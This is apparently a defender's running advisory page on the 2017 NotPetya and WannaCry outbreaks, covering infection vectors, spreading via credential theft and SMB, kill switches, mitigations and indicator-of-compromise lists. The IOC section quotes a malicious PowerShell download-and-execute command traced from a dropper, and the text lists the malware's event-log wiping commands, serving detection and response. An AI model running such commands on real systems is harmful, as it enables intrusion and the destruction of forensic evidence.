Need information for WannaCry?

Summary - 5-Jul-2017

Talos published a post describing the complete timeline of the NotPetya campaign, starting from infection at MeDoc to delivery : The MeDoc Connection.

Summary - 4-Jul-2017

Kaspersky published an article claiming that around the same time of the delivery of NotPetya another malware, also ransomware, was delivered via the update servers of MeDoc : In ExPetr/Petya’s shadow, FakeCry ransomware wave hits Ukraine. The ransomware contains a number of false flags to make it look like Wannacry.

Summary - 3-Jul-2017

There is little hope for those who payed the ransom in the hopes of unlocking encrypted hardware and recovering scrambled files. Researchers from Kaspersky Lab have discovered an error in the malware's code that prevents recovery of data. The ransomware part in NotPetya was a lure for the medea, whereas the real objective was the wiping of systems.

For those who'd like to disable the execution of psexec, please refer to this the blog article : Petya: disabling remote execution of psexec.

Summary - 30-Jun-2017

A number of security companies investigate on attribution or linking this campaign to previous malware campaigns.

Summary - 29-Jun-2017

So far no infection method via email has been found. This also means that the phishing delivering method is wrong and that CVE-2017-0199 did not play a role. The IPs listed in the IOC list are also not related to NotPetya. It doesn't harm monitoring these IPs for other ransomware waves (Loki?) but it will not protect you against NotPetya.

The update request for MeDoc seems to be querying the domain If you are unsure if your organization uses MeDoc you can use your proxy server logs to track connections.

As extra migitation actions, next to those listed below :

Also read the excellent analysis by Cisco Talos

Summary - 28-Jun-2017

Information that is currently know about the NotPetya ransomware attack.

How did all started?

Rhere are two main delivery methods known :

Note that the initial spreading did not take place via exploits from the Shadow Brokers leak of NSA tools. Compared to WannaCry, spreading takes place on the internal network, once the attackers already had a foothold in the network of the victim.

Kaspersky reported that NotPetya was also delivered via a watering hole attack to spread via a drive-by download. The sources of this attack have been cleaned.

Once inside a network, what happens next?

The malware has a set of capabilities allowing to work his way through the network of a victim. See for all the details :

Once it infects a host the further behavior depends on the malware process privilege level and the processes found to be running on the machine. Depending on processes found it will not infect the MBR or do network spreading via SMB.

If it does start encrypting the MBR, it will also schedule a reboot via a scheduled task (starts at a random time interval, between 10-60 minutes after infection).

Regardless of the privileges, it will always attempt to encrypt files on all fixed disks. It does not encrypt files in C:\Windows. There is no file extension added to encrypted files, the files are overwritten.

Note that by using the WMIC/PsExec/LSAdump hacking techniques, attackers can infect fully patched PCs found on local networks, including Windows 10.

Logs are also deleted (wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:v )

The code that is used for ETERNALBLUE is a cleaned-up code compared to sample used with WannaCry. This indicates some thought has been given to run this campaign.


There is a kill switch, but differently to WannaCry where it required a functioning network connection to a domain this kill switch has to be applied locally. Creating a file C:\Windows\perfc should prevent the encryption. Do note that the kill switch does not prevent network spreading, it only prevents a machine from getting encrypted. Placing perfc will only protect against current versions. NotPetya checks for a file with the same name as the filename that it was started from. If this gets changed to abcdef.dll the new variants will check for "C:\Windows\abcdef

Is it really ransomware? Or a wiper?

The malware itself is well written and goes to a couple of hoops to bypass AV detection (making use of a fake Microsoft signature and using XOR encrypted shellcode payload). On the other the payment chain (which is, from an attacker point of view the 'return on investment' part) is very bad. A nummber of reports came out that this worm is not meant to "montize" but rather to cause as much damage as possible, see Pnyetya: Yet Another Ransomware Outbreak.

Summary - 27-Jun-2017

The ransomware is delivered via "normal" Office documents, by the modified ETERNALBLUE exploit or by an attack against the update mechanism of MeDoc.

The ransomware captures credentials for spreading, using tools similar to Mimikatz. Credentials are extracted from the lsass.exe process. These credentials are then passed on to PsExec or WMIC for further spreading.

The malware waits 10-60 minutes after infection to reboot the system. Once rebooted it starts to encrypt the MFT table in NTFS partitions.

It spreads by enumerating all known server names via NetBIOS and also retrieves a list of DHCP leases. Each IP that has port 445 or 139 open is attacked.

What is the Petya ransomware?

The Petya ransomware, also known as Petwrap, is ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one. Instead, Petya reboots victims computers and encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk.

The current wave of Petya uses worm-like behaviour by exploiting ETERNALBLUE (also see the WannaCry advice) and CVE-2017-0199.

Note that according to Kaspersky this variant is not related to known version of Petya, hence the name NotPetya.

No Internet worm

The spreading of the worm seems to be limited to the local network.

See and According to Fox-IT this is because it looks at the DHCP leases. This is confirmed by Kaspersky : The malware enumerates all network adapters, all known server names via NetBIOS and also retrieves the list of current DHCP leases, if available. Each and every IP on the local network and each server found is checked for open TCP ports 445 and 139. Those machines that have these ports open are then attacked.

The local spreading means that there is another initial infection vector. According to Rapid7 this happened via the (normal) ransomware infection, a weaponized document that gets opened by a user. See further in the IOC list (.doc , .xls)?


Rumours are that Petya Ransomware is also taking advantage of WMIC and PSEXEC tools to infect fully-patched Windows computers. You are advised to disable WMIC (or block it to IT admin networks only) It dumps passwords and then uses PSEXEC and WMIC to move laterally.

Also see

According to Securelist, spreading can only happen on an infected system on the network possessing administrative credentials.

I applied MS17-010. I'm safe! - CVE-2017-0199

Some posts report that the ransomware is also using a client side vulnerability (CVE-2017-0199). Info on CVE-2017-0199 is available at A patch was made available in April-17 by Microsoft : and

For CVE-2017-0199 : Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.

Infection via CVE-2017-0199 is unconfirmed. It might be that one of the host sharing a sample was already infected with Loki ransomware.

Bitcoin address

Petya makes use of a Bitcoin address. You can monitor the number of payments via Do not pay the ransom!


A number of posts report on a kill switch (UNCONFIRMED)

Placing a file c:\windows\myguy or c:\windows\perfc


Indicators of compromise

These IOCs have been made available via and

*********** Possible IP addresses:

*********** Email:
[email protected]

*********** Malware dropped file:

*********** Hashes by codexgigas team:

For, we have:


As droppers

And for


*********** Targeted extensions by @GasGeverij

*********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
- - - - - - - - - - - - - - - - - - - - - - -  - 

File Name            Order-20062017.doc       (RTF із CVE-2017-0199)
MD5 Hash Identifier       415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier     101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier                FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size                6215 bytes
File Type              Rich Text Format data

Connects to the host:     80


File Name            myguy.xls
MD5 Hash Identifier       0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier     736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier                EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size                13893 bytes
File Type              Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://', '%APPDATA%\10807.exe') ;)
    10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name            BCA9D6.exe
MD5 Hash Identifier       A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier     9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier                17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size                275968 bytes

!!!! Unproofed
Connects to the host:  80           

Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part.

*********** IOС by Informzachita (

Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","",1,20170627
Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
Network activity,url,"","",1,20170627
Network activity,url,"","",1,20170627
Network activity,ip-dst|port,"|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"[email protected]","",1,20170627
Network activity,url,"","",1,20170627
Network activity,ip-dst|port,"|80","",1,20170627
Network activity,domain,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
External analysis,comment,"attack-vector:phishing","",0,20170627


Samples are at
Archive password: virus


WannaCry Updates

9-Jun-2017 : SambaCry is coming

Articles from Kaspersky and Cyphort on a crypto-miner targeting Linux hosts running vulnerable Samba servers. Patch Samba (4.6.4/4.5.10/4.4.14). Use your logs to observe exploitation attempts (write attempts for file consisting of 8 random symbols).

23-May-2017 : According to Costin Raiu, WannaCry itself did not support Windows XP

Individual machines could be infected - researchers and testers who put WannaCry on Windows XP systems likely ran it manually - but the worm-like attack code would not spread from an XP PC

22-May-2017 : WannaCry: Ransomware attacks show strong links to Lazarus group

According to Symantec :

Note : IOCs added to, get them through the OSINT feed in MISP.

OTX has another set of IOCs.

19-May-2017 : Updated Incident Response section - Decryption

Decryption possible for Windows XP to 7, including Windows 2003

19-May-2017 : WannaCry Exploit Now Being Used to Spread Spy Trojan

According to cyphort the vulnerability used by WannaCry (ETERNALBLUE) is now also used to spread a trojan.

17-May-2017 : Adylkuzz mining malware

Proofpoint published information on a cryptocurrency mining malware also making use of ETERNALBLUE/DOUBLEPULSAR. This malware predates (possible as early as 24-Apr) WannaCry.

16-May-2017 : OH LORDY! Comey Wanna Cry Edition

Shadow Brokers issued a statement. ETERNALBLUE was part of the exploit leading to WannaCry.

16-May-2017 : Jaff Ransomware is not WannaCry

Some researchers confuse the Jaff ransomware with WannaCry. Jaff is more a "traditional" style ransomware, explained in detail by Talos It's not the same as WannaCry.

16-May-2017 : Added Attribution section

16-May-2017 : Update mutex creation : TearSt0pper

15-May-2017 : Uiwix, WannaCry strain

Uiwix, has begun to spread by exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used.

15-May-2017 : Another variant

Detected by VirusTotal b9318a66fa7f50f2f3ecaca02a96268ad2c63db7554ea3acbde43bf517328d06

15-May-2017 : Updated SMBv1 section

15-May-2017 : Updated anti-virus section

15-May-2017 : NMAP NSE script to detect vulnerable servers

14-May-2017 : Two new new variants

Two new variants were found. See

Kill switches

Do not rely on these kill switches as single line of defense. The behavior of the malware can easily be changed so that these kill switches are no longer relevant! Also, Wannacry is not proxy aware. If you are in a proxied environment they will not help unless you setup an RPZ.




The patch is out since March 2017. Your patch management process should apply patches rated as critical in a timely manner. See

Microsoft also provided mitigation measures for unsupported systems.

Windows 10 and Windows Server 2016 are protected in their default configuration.

Why "Just Patch It!" Isn't as Easy as You Think

An article posted on the Trend Micro blog why Why "Just Patch It!" Isn't as Easy as You Think.

Disable SMBv1

Disable SMBv1. This is described in a Microsoft document :,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012

For example on Windows 8 you can do this in PowerShell

Blocking legacy protocols is always recommended!

UPDATE According to WannaCry FAQ: What you need to know today : The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection ... disabling SMBv2 can cause problems

Filter tcp/139 (NetBIOS), tcp/445 (SMB) and tcp/3389 (RDP)

All systems exposed to the Internet should filter NetBIOS, SMB and RDP.

Do not assume that a corporate firewall is enough. Systems connecting through a VPN might be exposed to the Internet prior to starting the VPN. Also do not forget systems that are dual-homed. If one system is infected, introducing it later on the network is enough.

Internal network filtering

Use local host firewalling on all you systems. Not every system needs to have SMB and RDP available on the network!

Apply network segmentation.

If you run CIFS (a variant of SMB) you are also targeted.

So far for RDP it looks like it's used as an initial attack vector via brute-force (guessing weak credentials). Once access gained via RDP, Wannacry is deployed and can spread automatically.

Disconnect your backups and test your restore procedures

Do not forget that backup servers can be a target also. Make sure the backup retention period is enough.

Backups must be off-line (detached from network connectivity or system connectivity).

Use a dedicated backup solution that is not using SMB!

Do not block the kill switch domains

No you should not. When the malware is capable of reaching the kill-switch domain it will not further spread the malware. When you block this domain, it will continue spreading both internal and external and start encrypting your files.

Log network, system and service events so that you know what is going on

Centrally log the events of your servers and workstations so that you know what is going on. Combine this information with network events.

Use threat intelligence data / alerts on these events.

Setup internal WannaCry sinkhole website

The Wannacry ransomware is not proxy aware. This means that organizations that use a corporate proxy will not benefit from the kill switch. See

The solution is to add the kill switch domains to an internal RPZ zone and redirect requests to an internal sinkhol. Note that the ransomware does expect an HTTP reply.

Scan and filter all mails with executable content

Note: no sample of the phishing e-mail that delivered the ransomware has been found (so far). Not sure about initial attack (maybe infected USB introduced on network?).

Disable macro scripts from Microsoft Office files transmitted via e-mail.

Good security practice.

Inform your employees

Repeat awareness campaigns!

Update your anti virus definitions

Update your anti virus definitions to prevent further infections. Anti virus definitions need time to include the new variants : do not rely on your anti virus / anti malware solution as the single line of defense.

UPDATE : It is important to note that anti-virus can potentially stop such attacks, even before researchers have seen a sample, ref. Modern Security Software not powerless against threats wannacry.

Create mutex that is used by WannaCry to prevent further inspection

A script has been developed by CCN that prevents the ransomware from starting to encrypt your files. It does this by creating the mutexes for which the ransomware checks. Note that the script needs to be run at every reboot. : Also see :

Afterwards, yo can check for the presence of the mutex with : handle -a | findstr MsWinZonesCacheCounterMutex. The Handle command can be downloaded from Sysinternals :

Further info on the mutexes is available at and here

There is an alternative tool (not tested) that accomplishes the same :

UPDATE Another tool to create the mutexes, TearSt0pper.

Subscribe to threat intelligence feeds / community work

Subscribe to a threat intelligence feed to get early indicators and detection. See MISP platform

NSE Script to detect ms17-010

An NSE script for NMAP to detect the MS17-010 was published

What is the WannaCry / Wcry / WannaCrypt ransomware?


A massive wave of ransomware that has all the characteristics of a worm. It utilises an exploit called ETERNALBLUE as well as leveraging a persistent backdoor known as DOUBLEPULSAR (both were part of the Shadow Brokers leak of NSA tools). ETERNALBLUE exploits a vulnerability in the Microsoft SMBv1 protocol. Exploiting this vulnerability allows an attacker to execute code on the vulnerable host.

Microsoft patched this vulnerablity in March, via MS17-010. Microsoft also released a patch for systems that were no longer under support.

The malware is persistent, meaning it will survive a system reboot!

Infection methods

Although there are claims that the infection happened via phishing e-mail, no sample of such a mail has been analyzed.

Incident response

Unplug the infected machine from the network

Segment and isolate networks that have infected machines.

Limit SMB connections

Limiting SMB connections will hugely affect your users because they will not be able to access the file servers. There's no need for your workstations for not filtering incoming SMB connections. This will prevent further spreading.

Look for other signs of infection

Do not pay the ransom

Restore backups

Inform your local / national CERT

For Belgium : [email protected]

Recovery encrypted files

There may be a possibility to recover the encryption (and hence recover the encrypted files) on Windows XP, if it was not rebooted after infection.

  According to WannaCry- Decrypting files with WanaKiwi + Demos the decryption works for both Windows XP (x86 confirmed) and Windows 7 (x86 confirmed). This would imply it works for every version of Windows from XP to 7, including Windows 2003 (x86 confirmed), Vista and 2008 and 2008 R2.

In order to decrypt the files it is important that

Do not delete the encrypted files yet, it might be possible that a decryption key may become available at some point in the future. There are however no guarantees that this will be possible.


Lazarus group

According to Kaspersky Lab there is strong evidence linking the WannaCry ransomware code to North Korea. There is a code overlap between Wannacry and a sample attributed to Lazarus in 2015. Note that the Lazarus group is believed to be responsible for the Sony Wiper attack, the Bangladesh bank heist and the DarkSeoul operation. ... "a theory a false flag although possible, is improbable."

Manually linking payments with encryption

Wannacry uses only four individual bitcoin addresses. There is no automatic identification between a payment and an encryption, meaning that the validation has to be a manual process. Most ransomware automates this process to provide a better "service" to their victims. Also see the article of Wired.



A live map can be found here :

Create a mutex (manually) ; PS :: $mtx = New-Object System.Threading.Mutex($false, "TestMutex")

Maintained by cudeso